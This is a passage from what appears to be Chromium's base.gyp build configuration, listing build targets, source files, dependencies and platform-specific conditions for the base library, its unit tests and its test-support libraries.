              '$(SDKROOT)/System/Library/Frameworks/CoreText.framework',
              '$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
              '$(SDKROOT)/System/Library/Frameworks/UIKit.framework',
            ],
          },
        }],
        ['OS != "win" and (OS != "ios" or _toolset == "host")', {
          'dependencies': ['third_party/libevent/libevent.gyp:libevent'],
        },],
        ['component=="shared_library"', {
          'conditions': [
            ['OS=="win"', {
              'sources!': [
                'debug/debug_on_start_win.cc',
              ],
            }],
          ],
        }],
        ['OS=="ios"', {
          'sources!': [
            'sync_socket.h',
            'sync_socket_posix.cc',
          ]
        }],
      ],
      'sources': [
        'auto_reset.h',
        'linux_util.cc',
        'linux_util.h',
        'message_loop/message_pump_android.cc',
        'message_loop/message_pump_android.h',
        'message_loop/message_pump_glib.cc',
        'message_loop/message_pump_glib.h',
        'message_loop/message_pump_io_ios.cc',
        'message_loop/message_pump_io_ios.h',
        'message_loop/message_pump_libevent.cc',
        'message_loop/message_pump_libevent.h',
        'message_loop/message_pump_mac.h',
        'message_loop/message_pump_mac.mm',
        'metrics/field_trial.cc',
        'metrics/field_trial.h',
        'posix/file_descriptor_shuffle.cc',
        'posix/file_descriptor_shuffle.h',
        'sync_socket.h',
        'sync_socket_posix.cc',
        'sync_socket_win.cc',
        'third_party/xdg_user_dirs/xdg_user_dir_lookup.cc',
        'third_party/xdg_user_dirs/xdg_user_dir_lookup.h',
      ],
      'includes': [
        '../build/android/increase_size_for_speed.gypi',
      ],
    },
    {
      # ICU-backed internationalization layer on top of base. Exports its
      # base and ICU dependencies so dependents pick them up transitively.
      'target_name': 'base_i18n',
      'type': '<(component)',
      'variables': {
        'enable_wexit_time_destructors': 1,
        'optimize': 'max',
        'base_i18n_target': 1,
      },
      'dependencies': [
        'base',
        'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
        '../third_party/icu/icu.gyp:icui18n',
        '../third_party/icu/icu.gyp:icuuc',
      ],
      'conditions': [
        ['OS == "win"', {
          # TODO(jschuh): crbug.com/167187 fix size_t to int truncations.
          'msvs_disabled_warnings': [
            4267,
          ],
        }],
        # Select how ICU locates its data: an external data file when
        # icu_use_data_file_flag==1, otherwise a shared DLL on Windows or
        # statically linked data elsewhere.
        ['icu_use_data_file_flag==1', {
          'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_FILE'],
        }, { # else icu_use_data_file_flag !=1
          'conditions': [
            ['OS=="win"', {
              'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_SHARED'],
            }, {
              'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_STATIC'],
            }],
          ],
        }],
        ['OS == "ios"', {
          'toolsets': ['host', 'target'],
        }],
      ],
      'export_dependent_settings': [
        'base',
        '../third_party/icu/icu.gyp:icuuc',
        '../third_party/icu/icu.gyp:icui18n',
      ],
      'includes': [
        '../build/android/increase_size_for_speed.gypi',
      ],
    },
{
'target_name': 'base_message_loop_tests',
'type': 'static_library',
'dependencies': [
'base',
'../testing/gtest.gyp:gtest',
],
'sources': [
'message_loop/message_loop_test.cc',
'message_loop/message_loop_test.h',
],
},
{
'target_name': 'base_prefs',
'type': '<(component)',
'variables': {
'enable_wexit_time_destructors': 1,
'optimize': 'max',
},
'dependencies': [
'base',
],
'export_dependent_settings': [
'base',
],
'defines': [
'BASE_PREFS_IMPLEMENTATION',
],
'sources': [
'prefs/base_prefs_export.h',
'prefs/default_pref_store.cc',
'prefs/default_pref_store.h',
'prefs/json_pref_store.cc',
'prefs/json_pref_store.h',
'prefs/overlay_user_pref_store.cc',
'prefs/overlay_user_pref_store.h',
'prefs/persistent_pref_store.h',
'prefs/pref_change_registrar.cc',
'prefs/pref_change_registrar.h',
'prefs/pref_filter.h',
'prefs/pref_member.cc',
'prefs/pref_member.h',
'prefs/pref_notifier.h',
'prefs/pref_notifier_impl.cc',
'prefs/pref_notifier_impl.h',
'prefs/pref_observer.h',
'prefs/pref_registry.cc',
'prefs/pref_registry.h',
'prefs/pref_registry_simple.cc',
'prefs/pref_registry_simple.h',
'prefs/pref_service.cc',
'prefs/pref_service.h',
'prefs/pref_service_factory.cc',
'prefs/pref_service_factory.h',
'prefs/pref_store.cc',
'prefs/pref_store.h',
'prefs/pref_value_map.cc',
'prefs/pref_value_map.h',
'prefs/pref_value_store.cc',
'prefs/pref_value_store.h',
'prefs/scoped_user_pref_update.cc',
'prefs/scoped_user_pref_update.h',
'prefs/value_map_pref_store.cc',
'prefs/value_map_pref_store.h',
'prefs/writeable_pref_store.h',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
{
'target_name': 'base_prefs_test_support',
'type': 'static_library',
'dependencies': [
'base',
'base_prefs',
'../testing/gmock.gyp:gmock',
],
'sources': [
'prefs/mock_pref_change_callback.cc',
'prefs/pref_store_observer_mock.cc',
'prefs/pref_store_observer_mock.h',
'prefs/testing_pref_service.cc',
'prefs/testing_pref_service.h',
'prefs/testing_pref_store.cc',
'prefs/testing_pref_store.h',
],
},
{
# This is the subset of files from base that should not be used with a
# dynamic library. Note that this library cannot depend on base because
# base depends on base_static.
'target_name': 'base_static',
'type': 'static_library',
'variables': {
'enable_wexit_time_destructors': 1,
'optimize': 'max',
},
'toolsets': ['host', 'target'],
'sources': [
'base_switches.cc',
'base_switches.h',
'win/pe_image.cc',
'win/pe_image.h',
],
'include_dirs': [
'..',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
# Include this target for a main() function that simply instantiates
# and runs a base::TestSuite.
{
'target_name': 'run_all_unittests',
'type': 'static_library',
'dependencies': [
'test_support_base',
],
'sources': [
'test/run_all_unittests.cc',
],
},
{
'target_name': 'base_unittests',
'type': '<(gtest_target_type)',
'sources': [
'allocator/tcmalloc_unittest.cc',
'android/application_status_listener_unittest.cc',
'android/content_uri_utils_unittest.cc',
'android/jni_android_unittest.cc',
'android/jni_array_unittest.cc',
'android/jni_string_unittest.cc',
'android/library_loader/library_prefetcher_unittest.cc',
'android/path_utils_unittest.cc',
'android/scoped_java_ref_unittest.cc',
'android/sys_utils_unittest.cc',
'at_exit_unittest.cc',
'atomicops_unittest.cc',
'barrier_closure_unittest.cc',
'base64_unittest.cc',
'base64url_unittest.cc',
'big_endian_unittest.cc',
'bind_unittest.cc',
'bind_unittest.nc',
'bits_unittest.cc',
'build_time_unittest.cc',
'callback_helpers_unittest.cc',
'callback_list_unittest.cc',
'callback_list_unittest.nc',
'callback_unittest.cc',
'callback_unittest.nc',
'cancelable_callback_unittest.cc',
'command_line_unittest.cc',
'containers/adapters_unittest.cc',
'containers/hash_tables_unittest.cc',
'containers/linked_list_unittest.cc',
'containers/mru_cache_unittest.cc',
'containers/scoped_ptr_hash_map_unittest.cc',
'containers/small_map_unittest.cc',
'containers/stack_container_unittest.cc',
'cpu_unittest.cc',
'debug/crash_logging_unittest.cc',
'debug/debugger_unittest.cc',
'debug/leak_tracker_unittest.cc',
'debug/proc_maps_linux_unittest.cc',
'debug/stack_trace_unittest.cc',
'debug/task_annotator_unittest.cc',
'deferred_sequenced_task_runner_unittest.cc',
'environment_unittest.cc',
'feature_list_unittest.cc',
'file_version_info_unittest.cc',
'files/dir_reader_posix_unittest.cc',
'files/file_locking_unittest.cc',
'files/file_path_unittest.cc',
'files/file_path_watcher_unittest.cc',
'files/file_proxy_unittest.cc',
'files/file_unittest.cc',
'files/file_util_proxy_unittest.cc',
'files/file_util_unittest.cc',
'files/important_file_writer_unittest.cc',
'files/memory_mapped_file_unittest.cc',
'files/scoped_temp_dir_unittest.cc',
'gmock_unittest.cc',
'guid_unittest.cc',
'hash_unittest.cc',
'i18n/break_iterator_unittest.cc',
'i18n/case_conversion_unittest.cc',
'i18n/char_iterator_unittest.cc',
'i18n/file_util_icu_unittest.cc',
'i18n/icu_string_conversions_unittest.cc',
'i18n/message_formatter_unittest.cc',
'i18n/number_formatting_unittest.cc',
'i18n/rtl_unittest.cc',
'i18n/streaming_utf8_validator_unittest.cc',
'i18n/string_search_unittest.cc',
'i18n/time_formatting_unittest.cc',
'i18n/timezone_unittest.cc',
'id_map_unittest.cc',
'ios/crb_protocol_observers_unittest.mm',
'ios/device_util_unittest.mm',
'ios/weak_nsobject_unittest.mm',
'json/json_parser_unittest.cc',
'json/json_reader_unittest.cc',
'json/json_value_converter_unittest.cc',
'json/json_value_serializer_unittest.cc',
'json/json_writer_unittest.cc',
'json/string_escape_unittest.cc',
'lazy_instance_unittest.cc',
'logging_unittest.cc',
'mac/bind_objc_block_unittest.mm',
'mac/call_with_eh_frame_unittest.mm',
'mac/dispatch_source_mach_unittest.cc',
'mac/foundation_util_unittest.mm',
'mac/libdispatch_task_runner_unittest.cc',
'mac/mac_util_unittest.mm',
'mac/objc_property_releaser_unittest.mm',
'mac/scoped_nsobject_unittest.mm',
'mac/scoped_objc_class_swizzler_unittest.mm',
'mac/scoped_sending_event_unittest.mm',
'md5_unittest.cc',
'memory/aligned_memory_unittest.cc',
'memory/discardable_shared_memory_unittest.cc',
'memory/linked_ptr_unittest.cc',
'memory/memory_pressure_listener_unittest.cc',
'memory/memory_pressure_monitor_chromeos_unittest.cc',
'memory/memory_pressure_monitor_mac_unittest.cc',
'memory/memory_pressure_monitor_win_unittest.cc',
'memory/ptr_util_unittest.cc',
'memory/ref_counted_memory_unittest.cc',
'memory/ref_counted_unittest.cc',
'memory/scoped_ptr_unittest.cc',
'memory/scoped_ptr_unittest.nc',
'memory/scoped_vector_unittest.cc',
'memory/shared_memory_unittest.cc',
'memory/shared_memory_mac_unittest.cc',
'memory/singleton_unittest.cc',
'memory/weak_ptr_unittest.cc',
'memory/weak_ptr_unittest.nc',
'message_loop/message_loop_task_runner_unittest.cc',
'message_loop/message_loop_unittest.cc',
'message_loop/message_pump_glib_unittest.cc',
'message_loop/message_pump_io_ios_unittest.cc',
'message_loop/message_pump_libevent_unittest.cc',
'metrics/bucket_ranges_unittest.cc',
'metrics/field_trial_unittest.cc',
'metrics/histogram_base_unittest.cc',
'metrics/histogram_delta_serialization_unittest.cc',
'metrics/histogram_macros_unittest.cc',
'metrics/histogram_snapshot_manager_unittest.cc',
'metrics/histogram_unittest.cc',
'metrics/metrics_hashes_unittest.cc',
'metrics/sample_map_unittest.cc',
'metrics/sample_vector_unittest.cc',
'metrics/sparse_histogram_unittest.cc',
'metrics/statistics_recorder_unittest.cc',
'native_library_unittest.cc',
'numerics/safe_numerics_unittest.cc',
'observer_list_unittest.cc',
'os_compat_android_unittest.cc',
'path_service_unittest.cc',
'pickle_unittest.cc',
'posix/file_descriptor_shuffle_unittest.cc',
'posix/unix_domain_socket_linux_unittest.cc',
'power_monitor/power_monitor_unittest.cc',
'prefs/default_pref_store_unittest.cc',
'prefs/json_pref_store_unittest.cc',
'prefs/mock_pref_change_callback.h',
'prefs/overlay_user_pref_store_unittest.cc',
'prefs/pref_change_registrar_unittest.cc',
'prefs/pref_member_unittest.cc',
'prefs/pref_notifier_impl_unittest.cc',
'prefs/pref_service_unittest.cc',
'prefs/pref_value_map_unittest.cc',
'prefs/pref_value_store_unittest.cc',
'prefs/scoped_user_pref_update_unittest.cc',
'process/memory_unittest.cc',
'process/memory_unittest_mac.h',
'process/memory_unittest_mac.mm',
'process/process_metrics_unittest.cc',
'process/process_metrics_unittest_ios.cc',
'process/process_unittest.cc',
'process/process_util_unittest.cc',
'profiler/stack_sampling_profiler_unittest.cc',
'profiler/tracked_time_unittest.cc',
'rand_util_unittest.cc',
'scoped_clear_errno_unittest.cc',
'scoped_generic_unittest.cc',
'scoped_native_library_unittest.cc',
'security_unittest.cc',
'sequence_checker_unittest.cc',
'sha1_unittest.cc',
'stl_util_unittest.cc',
'strings/nullable_string16_unittest.cc',
'strings/pattern_unittest.cc',
'strings/safe_sprintf_unittest.cc',
'strings/string16_unittest.cc',
'strings/string_number_conversions_unittest.cc',
'strings/string_piece_unittest.cc',
'strings/string_split_unittest.cc',
'strings/string_tokenizer_unittest.cc',
'strings/string_util_unittest.cc',
'strings/stringize_macros_unittest.cc',
'strings/stringprintf_unittest.cc',
'strings/sys_string_conversions_mac_unittest.mm',
'strings/sys_string_conversions_unittest.cc',
'strings/utf_offset_string_conversions_unittest.cc',
'strings/utf_string_conversions_unittest.cc',
'supports_user_data_unittest.cc',
'sync_socket_unittest.cc',
'synchronization/cancellation_flag_unittest.cc',
'synchronization/condition_variable_unittest.cc',
'synchronization/lock_unittest.cc',
'synchronization/waitable_event_unittest.cc',
'synchronization/waitable_event_watcher_unittest.cc',
'sys_info_unittest.cc',
'system_monitor/system_monitor_unittest.cc',
'task/cancelable_task_tracker_unittest.cc',
'task_runner_util_unittest.cc',
'template_util_unittest.cc',
'test/histogram_tester_unittest.cc',
'test/test_pending_task_unittest.cc',
'test/test_reg_util_win_unittest.cc',
'test/trace_event_analyzer_unittest.cc',
'test/user_action_tester_unittest.cc',
'threading/non_thread_safe_unittest.cc',
'threading/platform_thread_unittest.cc',
'threading/sequenced_worker_pool_unittest.cc',
'threading/sequenced_task_runner_handle_unittest.cc',
'threading/simple_thread_unittest.cc',
'threading/thread_checker_unittest.cc',
'threading/thread_collision_warner_unittest.cc',
'threading/thread_id_name_manager_unittest.cc',
'threading/thread_local_storage_unittest.cc',
'threading/thread_local_unittest.cc',
'threading/thread_unittest.cc',
'threading/watchdog_unittest.cc',
'threading/worker_pool_posix_unittest.cc',
'threading/worker_pool_unittest.cc',
'time/pr_time_unittest.cc',
'time/time_unittest.cc',
'time/time_win_unittest.cc',
'timer/hi_res_timer_manager_unittest.cc',
'timer/mock_timer_unittest.cc',
'timer/timer_unittest.cc',
'tools_sanity_unittest.cc',
'tracked_objects_unittest.cc',
'tuple_unittest.cc',
'values_unittest.cc',
'version_unittest.cc',
'vlog_unittest.cc',
'win/dllmain.cc',
'win/enum_variant_unittest.cc',
'win/event_trace_consumer_unittest.cc',
'win/event_trace_controller_unittest.cc',
'win/event_trace_provider_unittest.cc',
'win/i18n_unittest.cc',
'win/iunknown_impl_unittest.cc',
'win/message_window_unittest.cc',
'win/object_watcher_unittest.cc',
'win/pe_image_unittest.cc',
'win/registry_unittest.cc',
'win/scoped_bstr_unittest.cc',
'win/scoped_comptr_unittest.cc',
'win/scoped_handle_unittest.cc',
'win/scoped_process_information_unittest.cc',
'win/scoped_variant_unittest.cc',
'win/shortcut_unittest.cc',
'win/startup_information_unittest.cc',
'win/win_util_unittest.cc',
'win/wrapped_window_proc_unittest.cc',
'<@(trace_event_test_sources)',
],
'dependencies': [
'base',
'base_i18n',
'base_message_loop_tests',
'base_prefs',
'base_prefs_test_support',
'base_static',
'run_all_unittests',
'test_support_base',
'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'../testing/gmock.gyp:gmock',
'../testing/gtest.gyp:gtest',
'../third_party/icu/icu.gyp:icui18n',
'../third_party/icu/icu.gyp:icuuc',
],
'includes': ['../build/nocompile.gypi'],
'variables': {
# TODO(ajwong): Is there a way to autodetect this?
'module_dir': 'base'
},
'conditions': [
['OS == "android"', {
'dependencies': [
'android/jni_generator/jni_generator.gyp:jni_generator_tests',
'../testing/android/native_test.gyp:native_test_native_code',
],
}],
['OS == "ios" and _toolset != "host"', {
'sources/': [
# This test needs multiple processes.
['exclude', '^files/file_locking_unittest\\.cc$'],
# iOS does not support FilePathWatcher.
['exclude', '^files/file_path_watcher_unittest\\.cc$'],
# Only test the iOS-meaningful portion of memory and process_utils.
['exclude', '^memory/discardable_shared_memory_unittest\\.cc$'],
['exclude', '^memory/shared_memory_unittest\\.cc$'],
['exclude', '^process/memory_unittest'],
['exclude', '^process/process_unittest\\.cc$'],
['exclude', '^process/process_util_unittest\\.cc$'],
['include', '^process/process_util_unittest_ios\\.cc$'],
# iOS does not use message_pump_libevent.
['exclude', '^message_loop/message_pump_libevent_unittest\\.cc$'],
],
'actions': [
{
'action_name': 'copy_test_data',
'variables': {
'test_data_files': [
'test/data',
],
'test_data_prefix': 'base',
},
'includes': [ '../build/copy_test_data_ios.gypi' ],
},
],
}],
['desktop_linux == 1 or chromeos == 1', {
'defines': [
'USE_SYMBOLIZE',
],
'sources!': [
'file_version_info_unittest.cc',
],
'conditions': [
[ 'desktop_linux==1', {
'sources': [
'nix/xdg_util_unittest.cc',
],
}],
],
}],
['use_glib == 1', {
'dependencies': [
'../build/linux/system.gyp:glib',
],
}, { # use_glib == 0
'sources!': [
'message_loop/message_pump_glib_unittest.cc',
]
}],
['use_ozone == 1', {
'sources!': [
'message_loop/message_pump_glib_unittest.cc',
]
}],
['OS == "linux"', {
'dependencies': [
'malloc_wrapper',
],
'conditions': [
['use_allocator!="none"', {
'dependencies': [
'allocator/allocator.gyp:allocator',
],
}],
]},
],
[ 'OS == "win" and target_arch == "x64"', {
'sources': [
'profiler/win32_stack_frame_unwinder_unittest.cc',
],
'dependencies': [
'base_profiler_test_support_library',
],
}],
['OS == "win"', {
'sources!': [
'file_descriptor_shuffle_unittest.cc',
'files/dir_reader_posix_unittest.cc',
'message_loop/message_pump_libevent_unittest.cc',
'threading/worker_pool_posix_unittest.cc',
],
# TODO(jschuh): crbug.com/167187 fix size_t to int truncations.
'msvs_disabled_warnings': [
4267,
],
'conditions': [
# This is needed so base_unittests uses the allocator shim, as
# SecurityTest.MemoryAllocationRestriction* tests are dependent
# on tcmalloc.
# TODO(wfh): crbug.com/246278 Move tcmalloc specific tests into
# their own test suite.
['win_use_allocator_shim==1', {
'dependencies': [
'allocator/allocator.gyp:allocator',
],
}],
['icu_use_data_file_flag==0', {
# This is needed to trigger the dll copy step on windows.
# TODO(mark): This should not be necessary.
'dependencies': [
'../third_party/icu/icu.gyp:icudata',
],
}],
],
}, { # OS != "win"
'dependencies': [
'third_party/libevent/libevent.gyp:libevent'
],
}],
], # conditions
'target_conditions': [
['OS == "ios" and _toolset != "host"', {
'sources/': [
# Pull in specific Mac files for iOS (which have been filtered out
# by file name rules).
['include', '^mac/bind_objc_block_unittest\\.mm$'],
['include', '^mac/foundation_util_unittest\\.mm$',],
['include', '^mac/objc_property_releaser_unittest\\.mm$'],
['include', '^mac/scoped_nsobject_unittest\\.mm$'],
['include', '^sys_string_conversions_mac_unittest\\.mm$'],
],
}],
['OS == "android"', {
'sources/': [
['include', '^debug/proc_maps_linux_unittest\\.cc$'],
],
}],
# Enable more direct string conversions on platforms with native utf8
# strings
['OS=="mac" or OS=="ios" or <(chromeos)==1 or <(chromecast)==1', {
'defines': ['SYSTEM_NATIVE_UTF8'],
}],
# SyncSocket isn't used on iOS
['OS=="ios"', {
'sources!': [
'sync_socket_unittest.cc',
],
}],
], # target_conditions
},
{
# GN: //base:base_perftests
'target_name': 'base_perftests',
'type': '<(gtest_target_type)',
'dependencies': [
'base',
'test_support_base',
'../testing/gtest.gyp:gtest',
],
'sources': [
'message_loop/message_pump_perftest.cc',
'test/run_all_unittests.cc',
'threading/thread_perftest.cc',
'../testing/perf/perf_test.cc'
],
'conditions': [
['OS == "android"', {
'dependencies': [
'../testing/android/native_test.gyp:native_test_native_code',
],
}],
],
},
{
# GN: //base:base_i18n_perftests
'target_name': 'base_i18n_perftests',
'type': '<(gtest_target_type)',
'dependencies': [
'test_support_base',
'test_support_perf',
'../testing/gtest.gyp:gtest',
'base_i18n',
'base',
],
'sources': [
'i18n/streaming_utf8_validator_perftest.cc',
],
},
{
# GN: //base/test:test_support
'target_name': 'test_support_base',
'type': 'static_library',
'dependencies': [
'base',
'base_static',
'base_i18n',
'../testing/gmock.gyp:gmock',
'../testing/gtest.gyp:gtest',
'../third_party/icu/icu.gyp:icuuc',
'../third_party/libxml/libxml.gyp:libxml',
'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
],
'export_dependent_settings': [
'base',
],
'conditions': [
['os_posix==0', {
'sources!': [
'test/scoped_locale.cc',
'test/scoped_locale.h',
],
}],
['os_bsd==1', {
'sources!': [
'test/test_file_util_linux.cc',
],
}],
['OS == "android"', {
'dependencies': [
'base_unittests_jni_headers',
'base_java_unittest_support',
],
}],
['OS == "ios"', {
'toolsets': ['host', 'target'],
}],
],
'sources': [
'test/gtest_util.cc',
'test/gtest_util.h',
'test/gtest_xml_unittest_result_printer.cc',
'test/gtest_xml_unittest_result_printer.h',
'test/gtest_xml_util.cc',
'test/gtest_xml_util.h',
'test/histogram_tester.cc',
'test/histogram_tester.h',
'test/icu_test_util.cc',
'test/icu_test_util.h',
'test/ios/wait_util.h',
'test/ios/wait_util.mm',
'test/launcher/test_launcher.cc',
'test/launcher/test_launcher.h',
'test/launcher/test_result.cc',
'test/launcher/test_result.h',
'test/launcher/test_results_tracker.cc',
'test/launcher/test_results_tracker.h',
'test/launcher/unit_test_launcher.cc',
'test/launcher/unit_test_launcher.h',
'test/launcher/unit_test_launcher_ios.cc',
'test/mock_chrome_application_mac.h',
'test/mock_chrome_application_mac.mm',
'test/mock_devices_changed_observer.cc',
'test/mock_devices_changed_observer.h',
'test/mock_entropy_provider.cc',
'test/mock_entropy_provider.h',
'test/mock_log.cc',
'test/mock_log.h',
'test/multiprocess_test.cc',
'test/multiprocess_test.h',
'test/multiprocess_test_android.cc',
'test/null_task_runner.cc',
'test/null_task_runner.h',
'test/opaque_ref_counted.cc',
'test/opaque_ref_counted.h',
'test/perf_log.cc',
'test/perf_log.h',
'test/perf_test_suite.cc',
'test/perf_test_suite.h',
'test/perf_time_logger.cc',
'test/perf_time_logger.h',
'test/power_monitor_test_base.cc',
'test/power_monitor_test_base.h',
'test/scoped_locale.cc',
'test/scoped_locale.h',
'test/scoped_path_override.cc',
'test/scoped_path_override.h',
'test/sequenced_task_runner_test_template.cc',
'test/sequenced_task_runner_test_template.h',
'test/sequenced_worker_pool_owner.cc',
'test/sequenced_worker_pool_owner.h',
'test/simple_test_clock.cc',
'test/simple_test_clock.h',
'test/simple_test_tick_clock.cc',
'test/simple_test_tick_clock.h',
'test/task_runner_test_template.cc',
'test/task_runner_test_template.h',
'test/test_discardable_memory_allocator.cc',
'test/test_discardable_memory_allocator.h',
'test/test_file_util.cc',
'test/test_file_util.h',
'test/test_file_util_android.cc',
'test/test_file_util_linux.cc',
'test/test_file_util_mac.cc',
'test/test_file_util_posix.cc',
'test/test_file_util_win.cc',
'test/test_io_thread.cc',
'test/test_io_thread.h',
'test/test_listener_ios.h',
'test/test_listener_ios.mm',
'test/test_mock_time_task_runner.cc',
'test/test_mock_time_task_runner.h',
'test/test_pending_task.cc',
'test/test_pending_task.h',
'test/test_reg_util_win.cc',
'test/test_reg_util_win.h',
'test/test_shortcut_win.cc',
'test/test_shortcut_win.h',
'test/test_simple_task_runner.cc',
'test/test_simple_task_runner.h',
'test/test_suite.cc',
'test/test_suite.h',
'test/test_support_android.cc',
'test/test_support_android.h',
'test/test_support_ios.h',
'test/test_support_ios.mm',
'test/test_switches.cc',
'test/test_switches.h',
'test/test_timeouts.cc',
'test/test_timeouts.h',
'test/test_ui_thread_android.cc',
'test/test_ui_thread_android.h',
'test/thread_test_helper.cc',
'test/thread_test_helper.h',
'test/trace_event_analyzer.cc',
'test/trace_event_analyzer.h',
'test/trace_to_file.cc',
'test/trace_to_file.h',
'test/user_action_tester.cc',
'test/user_action_tester.h',
'test/values_test_util.cc',
'test/values_test_util.h',
],
'target_conditions': [
['OS == "ios"', {
'sources/': [
# Pull in specific Mac files for iOS (which have been filtered out
# by file name rules).
['include', '^test/test_file_util_mac\\.cc$'],
],
}],
['OS == "ios" and _toolset == "target"', {
'sources!': [
# iOS uses its own unit test launcher.
'test/launcher/unit_test_launcher.cc',
],
}],
['OS == "ios" and _toolset == "host"', {
'sources!': [
'test/launcher/unit_test_launcher_ios.cc',
'test/test_support_ios.h',
'test/test_support_ios.mm',
],
}],
], # target_conditions
},
{
'target_name': 'test_support_perf',
'type': 'static_library',
'dependencies': [
'base',
'test_support_base',
'../testing/gtest.gyp:gtest',
],
'sources': [
'test/run_all_perftests.cc',
],
'direct_dependent_settings': {
'defines': [
'PERF_TEST',
],
},
},
{
'target_name': 'test_launcher_nacl_nonsfi',
'conditions': [
['disable_nacl==0 and disable_nacl_untrusted==0 and enable_nacl_nonsfi_test==1', {
'type': 'static_library',
'sources': [
'test/launcher/test_launcher_nacl_nonsfi.cc',
],
'dependencies': [
'test_support_base',
],
}, {
'type': 'none',
}],
],
},
{
# GN version: //base/debug:debugging_flags
      # Since this generates a file, it must only be referenced in the target
# toolchain or there will be multiple rules that generate the header.
# When referenced from a target that might be compiled in the host
# toolchain, always refer to 'base_debugging_flags#target'.
'target_name': 'base_debugging_flags',
'includes': [ '../build/buildflag_header.gypi' ],
'variables': {
'buildflag_header_path': 'base/debug/debugging_flags.h',
'buildflag_flags': [
'ENABLE_PROFILING=<(profiling)',
],
},
},
],
'conditions': [
['OS=="ios" and "<(GENERATOR)"=="ninja"', {
'targets': [
{
'target_name': 'test_launcher',
'toolsets': ['host'],
'type': 'executable',
'dependencies': [
'test_support_base',
],
'sources': [
'test/launcher/test_launcher_ios.cc',
],
},
],
}],
['OS!="ios"', {
'targets': [
{
# GN: //base:check_example
'target_name': 'check_example',
'type': 'executable',
'sources': [
'check_example.cc',
],
'dependencies': [
'base',
],
},
{
'target_name': 'build_utf8_validator_tables',
'type': 'executable',
'toolsets': ['host'],
'dependencies': [
'base',
'../third_party/icu/icu.gyp:icuuc',
],
'sources': [
'i18n/build_utf8_validator_tables.cc'
],
},
],
}],
['OS == "win" and target_arch=="ia32"', {
'targets': [
# The base_win64 target here allows us to use base for Win64 targets
# (the normal build is 32 bits).
{
'target_name': 'base_win64',
'type': '<(component)',
'variables': {
'base_target': 1,
},
'dependencies': [
'base_debugging_flags#target',
'base_static_win64',
'../third_party/modp_b64/modp_b64.gyp:modp_b64_win64',
'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations_win64',
'trace_event/etw_manifest/etw_manifest.gyp:etw_manifest',
],
# TODO(gregoryd): direct_dependent_settings should be shared with the
# 32-bit target, but it doesn't work due to a bug in gyp
'direct_dependent_settings': {
'include_dirs': [
'..',
],
},
'defines': [
'BASE_WIN64',
'<@(nacl_win64_defines)',
],
'configurations': {
'Common_Base': {
'msvs_target_platform': 'x64',
},
},
'conditions': [
['component == "shared_library"', {
'sources!': [
'debug/debug_on_start_win.cc',
],
}],
],
# Specify delayload for base_win64.dll.
'msvs_settings': {
'VCLinkerTool': {
'DelayLoadDLLs': [
'cfgmgr32.dll',
'powrprof.dll',
'setupapi.dll',
],
'AdditionalDependencies': [
'cfgmgr32.lib',
'powrprof.lib',
'setupapi.lib',
],
},
},
# Specify delayload for components that link with base_win64.lib.
'all_dependent_settings': {
'msvs_settings': {
'VCLinkerTool': {
'DelayLoadDLLs': [
'cfgmgr32.dll',
'powrprof.dll',
'setupapi.dll',
],
'AdditionalDependencies': [
'cfgmgr32.lib',
'powrprof.lib',
'setupapi.lib',
],
},
},
},
# TODO(rvargas): Bug 78117. Remove this.
'msvs_disabled_warnings': [
4244,
4996,
4267,
],
'sources': [
'auto_reset.h',
'linux_util.cc',
'linux_util.h',
'md5.cc',
'md5.h',
'message_loop/message_pump_libevent.cc',
'message_loop/message_pump_libevent.h',
'metrics/field_trial.cc',
'metrics/field_trial.h',
'posix/file_descriptor_shuffle.cc',
'posix/file_descriptor_shuffle.h',
'sync_socket.h',
'sync_socket_posix.cc',
'sync_socket_win.cc',
'third_party/xdg_user_dirs/xdg_user_dir_lookup.cc',
'third_party/xdg_user_dirs/xdg_user_dir_lookup.h',
],
},
{
'target_name': 'base_i18n_nacl_win64',
'type': '<(component)',
# TODO(gregoryd): direct_dependent_settings should be shared with the
# 32-bit target, but it doesn't work due to a bug in gyp
'direct_dependent_settings': {
'include_dirs': [
'..',
],
},
'defines': [
'<@(nacl_win64_defines)',
'BASE_I18N_IMPLEMENTATION',
],
'include_dirs': [
'..',
],
'sources': [
'i18n/icu_util_nacl_win64.cc',
],
'configurations': {
'Common_Base': {
'msvs_target_platform': 'x64',
},
},
},
{
# TODO(rvargas): Remove this when gyp finally supports a clean model.
# See bug 36232.
'target_name': 'base_static_win64',
'type': 'static_library',
'sources': [
'base_switches.cc',
'base_switches.h',
'win/pe_image.cc',
'win/pe_image.h',
],
'sources!': [
# base64.cc depends on modp_b64.
'base64.cc',
],
'include_dirs': [
'..',
],
'configurations': {
'Common_Base': {
'msvs_target_platform': 'x64',
},
},
'defines': [
'<@(nacl_win64_defines)',
],
# TODO(rvargas): Bug 78117. Remove this.
'msvs_disabled_warnings': [
4244,
],
},
],
}],
['OS == "win" and target_arch=="x64"', {
'targets': [
{
'target_name': 'base_profiler_test_support_library',
# Must be a shared library so that it can be unloaded during testing.
'type': 'shared_library',
'include_dirs': [
'..',
],
'sources': [
'profiler/test_support_library.cc',
],
},
]
}],
['os_posix==1 and OS!="mac" and OS!="ios"', {
'targets': [
{
'target_name': 'symbolize',
'type': 'static_library',
'toolsets': ['host', 'target'],
'variables': {
'chromium_code': 0,
},
'conditions': [
['OS == "solaris"', {
'include_dirs': [
'/usr/gnu/include',
'/usr/gnu/include/libelf',
],
},],
],
'cflags': [
'-Wno-sign-compare',
],
'cflags!': [
'-Wextra',
],
'defines': [
'GLOG_BUILD_CONFIG_INCLUDE="build/build_config.h"',
],
'sources': [
'third_party/symbolize/config.h',
'third_party/symbolize/demangle.cc',
'third_party/symbolize/demangle.h',
'third_party/symbolize/glog/logging.h',
'third_party/symbolize/glog/raw_logging.h',
'third_party/symbolize/symbolize.cc',
'third_party/symbolize/symbolize.h',
'third_party/symbolize/utilities.h',
],
'include_dirs': [
'..',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
{
'target_name': 'xdg_mime',
'type': 'static_library',
'toolsets': ['host', 'target'],
'variables': {
'chromium_code': 0,
},
